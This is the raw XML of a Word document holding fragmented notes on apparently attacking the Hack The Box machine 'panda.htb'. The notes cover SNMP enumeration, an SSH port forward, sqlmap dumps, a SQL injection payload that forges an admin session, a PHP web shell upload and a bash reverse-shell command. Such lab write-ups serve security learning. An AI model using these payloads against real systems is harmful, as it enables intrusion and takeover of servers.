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64FCE6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1F766E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962E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962E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nnap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D962E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962E5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962E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962E5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962E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962E5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450C40ED" w14:textId="7F9922DC" w:rsidR="00D962E5" w:rsidRPr="00843DCE" w:rsidRDefault="0085174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Nmap </w:t>
      </w:r>
      <w:r w:rsidR="009272C2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="009272C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009272C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-p-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5CA403A0" w:rsidR="00843DCE" w:rsidRDefault="00D962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snmp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open via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udp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scan so try with it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026B4EAB" w14:textId="42980157" w:rsidR="00D962E5" w:rsidRDefault="00D962E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snmpwalk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-v 1 -c public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panda.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="41D03CD0" w:rsidR="00843DCE" w:rsidRDefault="00D962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login with password</w:t>
      </w:r>
      <w:r w:rsidR="00CC0907">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Do ssh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC72B4" w14:textId="77777777" w:rsidR="00CC0907" w:rsidRDefault="00CC0907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3ECB738B" w:rsidR="00843DCE" w:rsidRDefault="00E46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ssh so its an shell for us.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4A1E4703" w:rsidR="00843DCE" w:rsidRDefault="00E46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/var/www/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pendore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FE4FB74" w14:textId="17C89421" w:rsidR="00E46D6B" w:rsidRDefault="00E46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/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D2624" w14:textId="0BCBB34F" w:rsidR="00E46D6B" w:rsidRDefault="00E46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site-enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C92C5DF" w14:textId="4A70A0E0" w:rsidR="00E46D6B" w:rsidRDefault="00E46D6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pendore.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AEC23FA" w14:textId="48E5124F" w:rsidR="004E3D96" w:rsidRDefault="004E3D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Notice localhost:80</w:t>
      </w:r>
      <w:r w:rsidR="005E7DBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E7DBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pendore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E7D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5E7DBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>panda.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F66275A" w14:textId="3B9717F5" w:rsidR="00256BAA" w:rsidRDefault="00256B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Ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CC0A6D" w14:textId="0813F4D0" w:rsidR="00256BAA" w:rsidRDefault="00256B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-L 8000:127.0.0.1:80</w:t>
      </w:r>
      <w:r w:rsidR="00BC6FCD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //its forward the port to the 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5796BE0B" w14:textId="4A2765A8" w:rsidR="00256BAA" w:rsidRDefault="00256BA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browser run localhost:8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B7849C" w14:textId="77777777" w:rsidR="00BE0CB2" w:rsidRDefault="00BE0CB2" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498D3EFD" w14:textId="7000242F" w:rsidR="00BE0CB2" w:rsidRDefault="00BE0CB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Visit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pendora_console</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/include/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chart_generator.php?session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51897A59" w14:textId="7D0D20BC" w:rsidR="00BE0CB2" w:rsidRDefault="00BE0CB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Obtain the request to the burp suit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remoce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session id with connection:</w:t>
      </w:r>
      <w:r w:rsidR="00EA0663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close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F02581" w14:textId="6F4150C5" w:rsidR="00256BAA" w:rsidRDefault="003225E7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pendora.req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–batch </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63130FAD" w14:textId="70C2F56F" w:rsidR="00807C2A" w:rsidRDefault="00807C2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notice the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E881C58" w14:textId="047184BB" w:rsidR="00807C2A" w:rsidRDefault="00807C2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-T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tsession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2E3895">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r w:rsidR="002E3895">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B6CCE" w14:textId="2829DA27" w:rsidR="006D74D2" w:rsidRDefault="006D74D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-T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tusuario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–dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BCDA50" w14:textId="4C66052A" w:rsidR="006D74D2" w:rsidRDefault="006D74D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-D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-T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tsession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_php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–dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A148D" w14:textId="2B6DB5FC" w:rsidR="00843DCE" w:rsidRDefault="006D74D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we obtain much more information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1A10A" w14:textId="4888CDF5" w:rsidR="006D74D2" w:rsidRDefault="006D74D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session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=1’ union select 1,2,’id_usuario|s:5:”admin”;’-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE7767" w14:textId="2D0AC847" w:rsidR="00460325" w:rsidRDefault="0046032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login as admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3284DC81" w14:textId="77777777" w:rsidR="006D0F52" w:rsidRDefault="006D0F52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E0151EC" w14:textId="03A0FD3C" w:rsidR="00587595" w:rsidRDefault="006D0F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Open admin tools -&gt; file manager</w:t>
      </w:r>
      <w:r w:rsidR="004D4381">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we see index of images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922CFE8" w14:textId="6FCCE561" w:rsidR="00843DCE" w:rsidRDefault="003D148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Create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just system(request[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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61A61E" w14:textId="328F6C84" w:rsidR="008061B3" w:rsidRDefault="008061B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Localhost:8000/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pandora_console</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/images/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shell.php?cmd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</w:p>
    <w:p w14:paraId="2FD5872F" w14:textId="16198F5D" w:rsidR="00610176" w:rsidRDefault="0061017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Obtain in burp suit as post request and sent the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EDA87" w14:textId="7758AF70" w:rsidR="00610176" w:rsidRDefault="0061017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Bash -c ‘bash -I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/9001 0&gt;&amp;1’ with encode and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lisner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CBF2286" w14:textId="6D15FD92" w:rsidR="00610176" w:rsidRDefault="009A345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get an shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B06FA7" w14:textId="56867BD2" w:rsidR="009A3451" w:rsidRDefault="00334F4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Python3 -c ‘import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pty;pty.spawn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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149C663" w14:textId="30D62384" w:rsidR="004333F3" w:rsidRDefault="004333F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/home/matt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581595C0" w14:textId="2C63F968" w:rsidR="004333F3" w:rsidRDefault="004333F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user.txt</w:t>
      </w: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2D2CC98" w:rsidR="00843DCE" w:rsidRDefault="00F7726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the same </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B91FA" w14:textId="25C0C0CF" w:rsidR="00F77268" w:rsidRDefault="00F7726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Just add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDEEEF3" w14:textId="77777777" w:rsidR="00F77268" w:rsidRDefault="00F77268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7419F"/>
    <w:rsid w:val="002062CE"/>
    <w:rsid w:val="00256BAA"/>
    <w:rsid w:val="00292493"/>
    <w:rsid w:val="002E3895"/>
    <w:rsid w:val="003225E7"/>
    <w:rsid w:val="00334F4C"/>
    <w:rsid w:val="003A09E0"/>
    <w:rsid w:val="003D1487"/>
    <w:rsid w:val="00414301"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004333F3"/>
    <w:rsid w:val="00460325"/>
    <w:rsid w:val="004D4381"/>
    <w:rsid w:val="004E3D96"/>
    <w:rsid w:val="00532579"/>
    <w:rsid w:val="00587595"/>
    <w:rsid w:val="005E7DBE"/>
    <w:rsid w:val="00610176"/>
    <w:rsid w:val="006D0F52"/>
    <w:rsid w:val="006D74D2"/>
    <w:rsid w:val="008061B3"/>
    <w:rsid w:val="00807C2A"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00851748"/>
    <w:rsid w:val="009272C2"/>
    <w:rsid w:val="009A3451"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00BC6FCD"/>
    <w:rsid w:val="00BE0CB2"/>
    <w:rsid w:val="00CC0907"/>
    <w:rsid w:val="00CE6842"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D231D9"/>
    <w:rsid w:val="00D962E5"/>
    <w:rsid w:val="00E46D6B"/>
    <w:rsid w:val="00EA0663"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F77268"/>
    <w:rsid w:val="00F8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37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-11T13:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>